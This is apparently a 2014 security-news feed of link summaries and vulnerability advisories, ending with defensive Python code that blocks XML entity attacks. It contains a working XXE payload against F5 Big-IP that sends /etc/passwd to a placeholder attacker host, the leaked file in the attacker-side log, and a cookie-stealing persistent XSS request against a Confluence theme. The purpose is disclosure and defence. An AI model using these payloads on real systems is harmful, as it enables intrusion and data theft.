October 29, 2014, 3:54 am
A White House computer network was hit by hackers, resulting in a series of outages and connectivity issues, a White House official said Tuesday.
More here: http://www.latimes.com/nation/la-na-white-house-network-hack-20141028-story.html
October 29, 2014, 3:56 am
One year ago, I blogged about a nasty evolution of Kovter using a sick method to ensure people are shocked and in doubt enough to pay the ransom.
A week ago, while doing some Android browsing to check how some "Desktop world" badness would react on mobile, I was pushed a pseudo porn application.
More here: http://malware.dontneedcoffee.com/2014/10/the-worst-of-windows-police-locker-is.html
October 29, 2014, 3:57 am
The FTDI driver scandal is in the news, so I thought I'd write up some background, and show what a big deal this is.
More here: http://blog.erratasec.com/2014/10/the-deal-with-ftdi-driver-scandal.html#.VFDH1PnF-So
October 29, 2014, 3:58 am
Recently, there was a blog post on the takedown of a botnet used by the threat actor group known as Group 72 and their involvement in Operation SMN. This group is sophisticated, well funded, and exclusively targets high-profile organizations with high-value intellectual property in the manufacturing, industrial, aerospace, defense, and media sectors. The primary attack vectors are watering-hole, spear-phishing, and other web-based attacks.
More here: http://blogs.cisco.com/security/talos/opening-zxshell/
October 29, 2014, 3:59 am
A few years ago I came across an amusing Slashdot story: 'Australian Gov't offers $560k Cryptographic Protocol for Free'. The story concerned a protocol developed by Australia's Centrelink, the equivalent of our Health and Human Services department, that was wonderfully named the Protocol for Lightweight Authentication of ID, or (I kid you not), 'PLAID'.
More here: http://blog.cryptographyengineering.com/2014/10/attack-of-week-unpicking-plaid.html
October 29, 2014, 4:00 am
At the recent Hack.LU 2014 conference, Saumil Shah from net-square gave a talk on “Hacking with Pictures”. The basic idea behind this talk is hiding JavaScript inside a JPEG file.
More here: http://hiddencodes.wordpress.com/2014/10/29/hide-javascript-inside-jpeg-file/
October 29, 2014, 4:02 am
This article is about a funny way to obfuscate code that takes advantage of the ability of 64-bit Windows to manage and run 32-bit processes.
More here: http://scrammed.blogspot.com/2014/10/code-obfunscation-mixing-32-and-64-bit.html
October 29, 2014, 4:03 am
One of the primary challenges when running a vulnerability coordination program is distinguishing signal from noise. Our former colleagues at Facebook evaluate over 20 invalid submissions for each valid report - that's only 4.6% signal! The programs hosted at HackerOne have fared a bit better: on average 19% of reports are valid, but some outliers deal with as low as 6%. This noise is undesirable for everyone, driving up response time, introducing unnecessary latency in resolving security issues, and increasing the likelihood that valuable signal will get lost.
More here: https://hackerone.com/news/introducing-reputation
October 29, 2014, 4:05 am
Basic demo-quality implementation of Apple Pay In-App payment crypto
More here: https://github.com/beatty/applepay_crypto_demo
October 29, 2014, 4:06 am
The Microsoft Malware Protection Center (MMPC) has seen a spike in the number of detections for threats in the Win32/Crowti ransomware family this month as the result of new malware campaigns. Crowti is a family of ransomware that, when encountered, will attempt to encrypt the files on your PC and then ask for payment to unlock them. These threats are being distributed through spam email campaigns and exploits.
More here: http://blogs.technet.com/b/mmpc/archive/2014/10/28/the-dangers-of-opening-suspicious-emails-crowti-ransomware.aspx
October 29, 2014, 6:11 am
SEC Consult Vulnerability Lab Security Advisory < 20141029-0 >
=======================================================================
              title: Multiple critical vulnerabilities
            product: Vizensoft Admin Panel
 vulnerable version: 2014
      fixed version: -
             impact: critical
           homepage: http://www.vizensoft.com
              found: 2014-07-10
                 by: A. Antukh, A. Baranov
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor & product description:
=============================
Vizensoft is one of the major software vendors, especially aimed at medical
organizations in Korea.
A list of companies and organizations which are using their software is available
on the official websites:
http://www.vizensoft.com/portfolio/index.jsp
http://www.vizenmedical.com/portfolio/index.jsp

"Vizensoft are doing business with online marketing professional IT companies
and individuals in need of a rapidly changing competitive world to discerning
corporate customer's success by providing capabilities of a high quality
Marketing Technology"
(translated from Korean)
Source: http://vizensoft.com/about/index.jsp

Business recommendation:
========================
Attackers are able to completely compromise the web application built upon
Vizensoft CMS as they can gain access to the system and database level and
manage the website as an admin without prior authentication!

It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.

It is assumed that further critical vulnerabilities exist.

Vulnerability overview/description:
===================================
1) Admin Backdoor Account
-------------------------
The MySQL database table "admin" contains a "vizensoft" admin user with user
id 1 with administrative access rights. This user account does NOT show up within
the "User administration" menu when logged in as an administrator user account in
the web interface. Hence the password can't be changed there.

2) Authentication Bypass
------------------------
Unauthenticated attackers are able to gain full access to the administrator panel
and thus have total control over the web application, including content change,
reading e-mails, modifying users and abusing e-mail and SMS functionality.

3) Arbitrary File Upload
------------------------
At least two vulnerable pages exist where unauthenticated attackers are able
to upload arbitrary files on the server. Furthermore, due to insufficient
validation it is possible to bypass file extension checks and execute uploaded
files, which leads directly to a complete server compromise.

4) Multiple Cross Site Scripting issues
---------------------------------------
Vizensoft CMS suffers from multiple cross-site scripting vulnerabilities,
which allow an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the web interface and user messages.

5) Multiple unauthenticated SQL injection issues
------------------------------------------------
The web application framework suffers from multiple SQL injection vulnerabilities
that can be exploited without prior authentication!
By exploiting this vulnerability, an attacker gains access to all records
stored in the database with the privileges of the database user.

6) Source Code Disclosure
-------------------------
The default installation of Vizensoft CMS opens a large spectrum for information
gathering for the attacker. It is possible to disclose source code of the
application, configuration files and even steal passwords for direct connection
to the database.

7) Missing Password Policy
--------------------------
The password policy used in the CMS does not restrict the complexity of the
password in any way, which makes users of the application vulnerable to
possibly bad passwords and further attacks on their accounts such as guessing
and brute-forcing.

Proof of concept:
=================
The proof of concept information has been removed from this advisory as the
vendor failed to respond within 50 work days and does not provide a fix.

1) Admin Backdoor Account
-------------------------
The MySQL-SHA1 password hash of the hidden admin user vizensoft is:
[removed]

The user does not show up within the admin web interface even when logged in
as an administrator. Moreover, due to an intentionally left backdoor login page,
it is possible to disclose the password, thus making any system which is built on
Vizensoft CMS vulnerable.
Link to the backdoor page is presented below:
[removed]

Credentials for authentication are the following:
vizensoft:[removed]

Detailed proof of concept exploits have been removed for this vulnerability.

2) Authentication Bypass
------------------------
The login form for the administration panel of the Vizensoft CMS can be accessed by
following the next URL:
[removed]

If an attacker tries to access the admin panel without valid authentication,
a confirmation window, demanding to proceed to the login form, is shown. This
confirmation window can be bypassed and the attacker then gains access to the
admin panel.

Detailed proof of concept exploits have been removed for this vulnerability.

3) Arbitrary File Upload
------------------------
The following script can be accessed by an unauthenticated attacker in order
to upload arbitrary files to the [removed] directory:
[removed]

The common problem here is that the filename extension checks are only done on
the client and not on the server side, which makes it extremely easy for an
attacker to circumvent them and upload a desired file anyway.

Moreover, due to the vulnerable photo uploader packaged in a default installation of
Vizensoft CMS, it is possible to bypass the default checks and upload any file on the
server in order to later execute it on the server and gain full access to the system.
The HTML page serving image uploads resides at the following URL:
[removed]

Detailed proof of concept exploits have been removed for this vulnerability.

4) Multiple Cross Site Scripting issues
---------------------------------------
The following URLs are examples for reflected XSS (list is not complete):
[removed]

It is assumed that further scripts are vulnerable to XSS!

Detailed proof of concept exploits have been removed for this vulnerability.

5) Multiple unauthenticated SQL injection issues
------------------------------------------------
The following sample request (no authentication needed!) will return the concatenated
string AABB in the error message, which proves the existence of SQL injection.
[removed]

Further exploitation allows an attacker to extract usernames and passwords from the
'admin' table. Since all password hashes are hashed using MySQL SHA-1 without a
salt and since the password policy is not strict, it's easy to brute-force extracted
passwords using standard means.

Further affected scripts and parameters (list not complete):
[removed]

It is assumed that further SQL injection vulnerabilities exist!

Detailed proof of concept exploits have been removed for this vulnerability.

6) Source code disclosure
-------------------------
The following script can be used to retrieve the content of any file in the web root
directory:
[removed]

For example, the following files (both configuration and default functional) can be
retrieved via this script:
[removed]

This is extremely dangerous, since some of them contain configuration
information for the SQL server such as connection string, username and cleartext
password. More files with hardcoded passwords can be obtained - for example,
[removed] contains hard-coded passwords for external services.

Detailed proof of concept exploits have been removed for this vulnerability.

7) Missing Password Policy
--------------------------
No proof of concept necessary.

Vulnerable / tested versions:
=============================
The vulnerabilities have been verified to exist in the latest version of
Vizensoft Admin Panel 2014. It is assumed previous releases are affected too.

Vendor contact timeline:
------------------------
2014-09-09: Contacted vendor through vizensoft@vizensoft.com, requesting encryption keys and attaching responsible disclosure policy. No response.
2014-09-12: Contacted vendor through service@vizensoft.com, question@vizensoft.com, info@vizensoft.com and support@vizensoft.com, requesting encryption keys and attaching responsible disclosure policy. No response.
2014-10-20: Latest possible release date of 29/10/2014 reminder.
2014-10-29: SEC Consult releases security advisory.

Solution:
---------
It is recommended to suspend use of the product until the security update is
released and a detailed security review of the product has been performed.

Workaround:
-----------
No workaround available.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF A. Antukh / @2014
October 29, 2014, 6:13 am
SEC Consult Vulnerability Lab Security Advisory < 20141029-1 >
=======================================================================
              title: Persistent cross site scripting
            product: Confluence RefinedWiki Original Theme
 vulnerable version: 3.x - 4.0.x
      fixed version: 4.0.12
             impact: high
           homepage: http://www.refinedwiki.com/
              found: 2014-08-07
                 by: Manuel Hofer
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"RefinedWiki Original Theme is the perfect add-on for smarter collaboration
and documentation. It can turn Confluence into an Intranet or Extranet and
with improved organization, more intuitive navigation and customizable
designs, your whole team will love using Confluence."
http://www.refinedwiki.com/en/display/products.aspx

Business recommendation:
------------------------
By exploiting this vulnerability, users that are able to create or edit
content can attack other users of Confluence. An attacker might be able to
gain access to otherwise protected information in Confluence.

It is recommended to upgrade to the latest version of RefinedWiki Original
Theme.

Vulnerability overview/description:
-----------------------------------
1) Persistent Cross-Site Scripting
The vulnerability can be used to persistently include HTML or JavaScript
code in the "Activity Stream" of Confluence. The code is executed in the
browser of users if they visit the manipulated site. The vulnerability can be
used to change the contents of the displayed site, redirect to other sites or
steal user credentials. Additionally, Confluence users are potential victims
of browser exploits and JavaScript Trojans.

Proof of concept:
-----------------
1) Persistent Cross-Site Scripting
A user with the necessary permissions to create or edit content in Confluence
can exploit this vulnerability by placing the XSS payload inside the
vulnerable POST parameter "versionComment" as shown in the following request.

> POST /pages/doeditpage.action?pageId=111111 HTTP/1.1
> [...]
> atl_token=5aabd74e50724eaac8290a3447d9f6e7a179559e&originalVersion=5
> &title=Title&wysiwygContent=[REMOVED]&watchPageAfterComment=true
> &versionComment=<script>alert(document.cookie)</script>
> &notifyWatchers=true&confirm=Save&viewPermissionsUsers=
> &editPermissionsUsers=&viewPermissionsGroups=&editPermissionsGroups=
> &parentPageString=&moveHierarchy=true&position=&targetId=&draftId=0
> &entityId=9012708&newSpaceKey=tools

The submitted XSS payload gets executed every time a user visits the activity
stream of the edited page.

Vulnerable / tested versions:
-----------------------------
According to the vendor, the affected versions of RefinedWiki Original Theme
are 3.x - 4.0.x.

Vendor contact timeline:
------------------------
2014-08-08: Contacting Atlassian through issue tracking platform at https://jira.atlassian.com/browse/CONF-34525
2014-08-15: Issue identified as part of the RefinedWiki Original Theme and not Confluence itself. Atlassian forwards advisory to RefinedWiki team
2014-08-15: Vendor acknowledges the vulnerability
2014-08-18: Vendor provides fixed version
2014-08-27: Vendor releases fixed version to the public
2014-10-29: SEC Consult releases security advisory

Solution:
---------
Upgrade to the latest version available:
http://demo.refinedwiki.com/display/rwot/Version+4.0.12
Fixes are also included in version 3.5.13 and version 4.1

Workaround:
-----------
-

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Manuel Hofer / @2014
October 29, 2014, 8:54 am
Here's a bad sign for CurrentC, the fledgling mobile payment system in development by a consortium of retailers.
CurrentC is sending emails to people warning them "that unauthorized third parties obtained the e-mail addresses of some of you."
Read more: http://www.businessinsider.com/currentc-hacked-2014-10#ixzz3HY9dNTbF
October 29, 2014, 8:56 am
Many equate DDoS with only one type of attack vector – volumetric. It is not surprising, as these high bandwidth consuming attacks seem to frequent the headlines most often. Volumetric DDoS attacks are easier to identify, and defend against with on-premises or cloud anti-DDoS solutions, or a combination of both.
Recently, Corero Network Security has identified a change in the way attackers are using DDoS as a mechanism to target corporate Enterprises, Hosting Providers and Internet Service Providers.
More here: http://www.securitybistro.com/?p=8983
October 29, 2014, 10:04 am
In his career-ending extramarital affair that came to light in 2012, General David Petraeus used a stealthy technique to communicate with his lover Paula Broadwell: the pair left messages for each other in the drafts folder of a shared Gmail account. Now hackers have learned the same trick. Only instead of a mistress, they’re sharing their love letters with data-stealing malware buried deep on a victim’s computer.
More here: http://www.wired.com/2014/10/hackers-using-gmail-drafts-update-malware-steal-data/
October 29, 2014, 4:09 pm
Here at Context we work hard to keep our clients safe. During routine client monitoring our analysts noticed some suspicious RDP traffic. It was suspicious for two reasons. Firstly the client was not in the habit of using RDP, and secondly it had a Chinese keyboard layout.
More here: http://contextis.com/resources/blog/rdp-replay/
October 29, 2014, 4:30 pm
Tomorrow at MALCON 2014, security researcher Mordechai Guri, with guidance from Prof. Yuval Elovici of the cyber security labs at Ben-Gurion University in Israel, will present a breakthrough method (“AirHopper”) for leaking data from an isolated computer to a mobile phone without the presence of a network.
More here: http://cyber.bgu.ac.il/content/how-leak-sensitive-data-isolated-computer-air-gap-near-mobile-phone-airhopper
October 30, 2014, 3:45 am
Security incidents seldom are unrelated. Connecting those dots can help us better understand the underlying architecture and groups involved in cyber-crime.
Since early July, we have been tracking a malware campaign that leverages legitimate websites, DNS records and exploit kit operators.
This mechanism in itself is not something new since the majority of drive-by downloads are the result of malicious redirections from legitimate sites and rotating URLs used as the doorway to exploit kit landing pages.
More here: https://blog.malwarebytes.org/exploits-2/2014/10/exposing-the-flash-eitest-malware-campaign/
October 30, 2014, 3:47 am
Vulnerability title: XML External Entity Injection in F5 Networks Big-IP
CVE: CVE-2014-6032
Vendor: F5 Networks
Product: Big-IP
Affected version: 11.3.0.39.0
Fixed version: N/A
Reported by: Oliver Gruskovnjak

Details:
F5 Networks Big-IP is vulnerable to an XML External Entity injection attack. The following XML payload was used to trigger the XXE (the vulnerable URL is redacted due to the number of affected systems):

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://x.x.x.x/xml?f=/etc/passwd">
%remote;%int;%trick;]>
<deal type="request" id="1"><card type="query" id="1"/></deal>

On the attacking server the file can be read from the web server logs:

10.1.10.10 - - [20/Aug/2014:00:17:44 PDT] "GET /xml?f=/etc/passwd HTTP/1.1" 200 128
- -> /xml?f=/etc/passwd
10.1.10.10 - - [20/Aug/2014 00:17:44] "GET /?p=root:x:0:0:root:/root:/bin/bash%0Abin:x:1:1:bin:/bin:/sbin/nologin%0Adaemon:x:2:2:daemon:/sbin:/sbin/nologin%0Aadm:x:3:4:adm:/var/adm:/sbin/nologin%0Alp:x:4:7:lp:/var/spool/lpd:/sbin/nologin%0Amail:x:8:12:mail:/var/spool/mail:/sbin/nologin%0Auucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin%0Aoperator:x:11:0:operator:/root:/sbin/nologin%0Anobody:x:99:99:Nobody:/:/sbin/nologin%0Atmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin%0Aadmin:x:0:500:Admin%20User:/home/admin:/bin/false%0Aapache:x:48:48:Apache:/usr/local/www:/bin/bash%0Amysql:x:98:98:MySQL%20server:/var/lib/mysql:/sbin/nologin%0Avcsa:x:69:69:virtual%20console%20memory%20owner:/dev:/sbin/nologin%0Aoprofile:x:16:16:Special%20user%20account%20to%20be%20used%20by%20OProfile:/:/sbin/nologin%0Asshd:x:74:74:Privilege-separated%20SSH:/var/empty/sshd:/sbin/nologin%0Asyscheck:x:976:10::/:/sbin/nologin%0Arpc:x:32:32:Portmapper%20RPC%20user:/:/sbin/nologin%0Af5_remoteuser:x:499:499:f5%20remote%20user%20account:/home/f5_remoteuser:/sbin/nologin%0Apcap:x:77:77::/var/arpwatch:/sbin/nologin%0Atomcat:x:91:91:Apache%20Tomcat:/usr/share/tomcat:/sbin/nologin%0Antp:x:38:38::/etc/ntp:/sbin/nologin%0Anamed:x:25:25:Named:/var/named:/bin/false%0A HTTP/1.1" 200 - 0.0013

Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-6032/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
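The payload above works only because the XML parser honours the DOCTYPE and fetches the parameter entity "%remote;" from the attacker's host. As an added example (not code from the Portcullis advisory or from F5), the parser below uses Python's bundled expat bindings to refuse any DOCTYPE and any external entity before a single byte leaves the box, and shows that the advisory's payload is rejected while a DTD-free request in the same deal/card format still parses; the benign request is constructed for this example.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when untrusted XML declares a DTD or references an external entity."""


def parse_untrusted_xml(data: bytes) -> list:
    """Parse XML from an untrusted client without resolving any entity.

    Returns the (tag, attributes) pairs in document order. Any DOCTYPE is
    refused outright: the CVE-2014-6032 payload needs one to declare the
    parameter entity that pulls in the attacker's DTD, and the deal/card
    request shown in the advisory never needs a DTD at all.
    """
    parser = expat.ParserCreate()
    # Never load external parameter entities (the "%remote;" DTD fetch).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Called at the start of <!DOCTYPE ...>, before any entity is declared.
        raise UnsafeXML(f"DOCTYPE {name!r} is not allowed in untrusted input")

    def reject_external_entity(context, base, sysid, pubid):
        # Second line of defence: expat asks here before fetching any
        # external entity; raising aborts the parse instead of fetching.
        raise UnsafeXML(f"refusing to resolve external entity {sysid!r}")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external_entity

    elements = []
    parser.StartElementHandler = lambda tag, attrs: elements.append((tag, dict(attrs)))
    parser.Parse(data, True)  # True: this is the final chunk
    return elements


def classify(data: bytes) -> str:
    """'ok' for a plain document, 'rejected' for DTD/entity tricks, 'malformed' otherwise."""
    try:
        parse_untrusted_xml(data)
        return "ok"
    except UnsafeXML:
        return "rejected"
    except expat.ExpatError:
        return "malformed"


# The XXE payload quoted in the advisory above (x.x.x.x is the advisory's placeholder).
XXE_PAYLOAD = (
    b'<?xml version="1.0" encoding="utf-8"?>'
    b'<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://x.x.x.x/xml?f=/etc/passwd">'
    b' %remote;%int;%trick;]>'
    b'<deal type="request" id="1"><card type="query" id="1"/></deal>'
)

# Constructed benign request in the same deal/card format, with no DTD.
BENIGN_REQUEST = (
    b'<?xml version="1.0" encoding="utf-8"?>'
    b'<deal type="request" id="1"><card type="query" id="1"/></deal>'
)

if __name__ == "__main__":
    print("payload:", classify(XXE_PAYLOAD))     # rejected
    print("benign: ", classify(BENIGN_REQUEST))  # ok
```

The same DOCTYPE rejection covers internal entities too, so classic entity-expansion ("billion laughs") documents are refused by the same handler.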